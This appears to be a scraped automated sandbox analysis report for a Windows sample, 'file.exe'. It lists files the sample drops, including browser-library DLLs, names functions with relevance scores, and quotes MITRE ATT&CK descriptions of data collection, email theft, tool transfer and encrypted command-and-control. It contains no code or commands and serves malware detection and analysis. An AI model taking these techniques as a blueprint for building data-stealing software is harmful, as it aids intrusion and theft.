Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEHIJDAFBKFHIDGCFBFCBAFIIJ

C:\ProgramData\BAECFCAA

C:\ProgramData\BFCGDAAKFHIDBFIDBKFH

C:\ProgramData\DGCFHIDAKECFHIEBFCGIJDBKJD

C:\ProgramData\FHCGCAAK

C:\ProgramData\HCFCFHJDBKJKEBFHJEHI

C:\ProgramData\JKEGIDGDGHCAAAAKKFCG

C:\ProgramData\KKJDGDHIDBGIECBGHJDBAAKJDH

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00489860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 004745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0047BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C5E35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00484910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00474880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00489C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00477710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00480250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00475100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre